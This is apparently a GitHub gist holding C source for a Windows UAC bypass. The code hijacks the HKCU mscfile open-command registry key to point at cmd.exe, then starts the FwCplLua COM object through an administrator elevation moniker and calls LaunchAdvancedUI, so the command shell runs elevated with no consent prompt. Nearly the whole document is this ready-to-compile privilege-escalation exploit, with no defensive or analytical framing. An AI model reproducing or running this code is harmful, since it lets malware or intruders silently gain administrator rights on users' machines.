-
-
Save decay88/6bf2a180eea65c1b38a788ef83c786be to your computer and use it in GitHub Desktop.
UAC bypass using FwCplLua COM interface and HKCU mscfile registry entry hijack
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
typedef interface IFwCplLua IFwCplLua; | |
typedef struct IFwCplLuaInterfaceVtbl { | |
BEGIN_INTERFACE | |
HRESULT(STDMETHODCALLTYPE *QueryInterface)( | |
__RPC__in IFwCplLua * This, | |
__RPC__in REFIID riid, | |
_COM_Outptr_ void **ppvObject); | |
ULONG(STDMETHODCALLTYPE *AddRef)( | |
__RPC__in IFwCplLua * This); | |
ULONG(STDMETHODCALLTYPE *Release)( | |
__RPC__in IFwCplLua * This); | |
HRESULT(STDMETHODCALLTYPE *Method1)( | |
__RPC__in IFwCplLua * This); | |
HRESULT(STDMETHODCALLTYPE *Method2)( | |
__RPC__in IFwCplLua * This); | |
HRESULT(STDMETHODCALLTYPE *Method3)( | |
__RPC__in IFwCplLua * This); | |
HRESULT(STDMETHODCALLTYPE *Method4)( | |
__RPC__in IFwCplLua * This); | |
HRESULT(STDMETHODCALLTYPE *Method5)( | |
__RPC__in IFwCplLua * This); | |
HRESULT(STDMETHODCALLTYPE *Method6)( | |
__RPC__in IFwCplLua * This); | |
HRESULT(STDMETHODCALLTYPE *Method7)( | |
__RPC__in IFwCplLua * This); | |
HRESULT(STDMETHODCALLTYPE *Method8)( | |
__RPC__in IFwCplLua * This); | |
HRESULT(STDMETHODCALLTYPE *Method9)( | |
__RPC__in IFwCplLua * This); | |
HRESULT(STDMETHODCALLTYPE *Method10)( | |
__RPC__in IFwCplLua * This); | |
HRESULT(STDMETHODCALLTYPE *Method11)( | |
__RPC__in IFwCplLua * This); | |
HRESULT(STDMETHODCALLTYPE *Method12)( | |
__RPC__in IFwCplLua * This); | |
HRESULT(STDMETHODCALLTYPE *Method13)( | |
__RPC__in IFwCplLua * This); | |
HRESULT(STDMETHODCALLTYPE *Method14)( | |
__RPC__in IFwCplLua * This); | |
HRESULT(STDMETHODCALLTYPE *Method15)( | |
__RPC__in IFwCplLua * This); | |
HRESULT(STDMETHODCALLTYPE *LaunchAdvancedUI)( | |
__RPC__in IFwCplLua * This); | |
END_INTERFACE | |
} *PIFwCplLuaInterfaceVtbl; | |
interface IFwCplLua | |
{ | |
CONST_VTBL struct IFwCplLuaInterfaceVtbl *lpVtbl; | |
}; | |
#define T_CLSID_FwCplLua L"{752438CB-E941-433F-BCB4-8B7D2329F0C8}" | |
#define T_IID_IFwCplLua L"{56DA8B35-7FC3-45DF-8768-664147864573}" | |
BOOL Method42b_Test( | |
LPWSTR lpszPayload | |
) | |
{ | |
HRESULT r = E_FAIL; | |
BOOL bCond = FALSE; | |
LPWSTR lpBuffer = NULL; | |
LRESULT lResult; | |
HKEY hKey = NULL; | |
SIZE_T sz = 0; | |
IID xIIDFwCplLua; | |
IFwCplLua *FwCplLua = NULL; | |
BIND_OPTS3 bop; | |
WCHAR szBuffer[MAX_PATH + 1]; | |
WCHAR szElevationMoniker[MAX_PATH]; | |
do { | |
if (IIDFromString(T_IID_IFwCplLua, &xIIDFwCplLua) != S_OK) { | |
break; | |
} | |
_strcpy(szBuffer, L"C:\\windows\\system32\\cmd.exe"); | |
lpBuffer = szBuffer; | |
sz = _strlen(lpBuffer); | |
if (sz == 0) | |
break; | |
lResult = RegCreateKeyEx(HKEY_CURRENT_USER, | |
L"Software\\Classes\\mscfile\\shell\\open\\command", | |
0, | |
NULL, | |
REG_OPTION_NON_VOLATILE, | |
MAXIMUM_ALLOWED, | |
NULL, | |
&hKey, | |
NULL); | |
if (lResult != ERROR_SUCCESS) | |
break; | |
sz = (1 + sz) * sizeof(WCHAR); | |
lResult = RegSetValueEx( | |
hKey, | |
TEXT(""), | |
0, | |
REG_SZ, | |
(BYTE*)lpBuffer, | |
(DWORD)sz); | |
if (lResult != ERROR_SUCCESS) | |
break; | |
RegCloseKey(hKey); | |
hKey = NULL; | |
_strcpy(szElevationMoniker, L"Elevation:Administrator!new:"); | |
_strcat(szElevationMoniker, T_CLSID_FwCplLua); | |
RtlSecureZeroMemory(&bop, sizeof(bop)); | |
bop.cbStruct = sizeof(bop); | |
bop.dwClassContext = CLSCTX_LOCAL_SERVER; | |
r = CoGetObject(szElevationMoniker, (BIND_OPTS *)&bop, &xIIDFwCplLua, &FwCplLua); | |
if (r != S_OK) | |
break; | |
if (FwCplLua == NULL) { | |
r = E_FAIL; | |
break; | |
} | |
r = FwCplLua->lpVtbl->LaunchAdvancedUI(FwCplLua); | |
} while (bCond); | |
if (hKey != NULL) | |
RegCloseKey(hKey); | |
if (FwCplLua != NULL) { | |
FwCplLua->lpVtbl->Release(FwCplLua); | |
} | |
return SUCCEEDED(r); | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment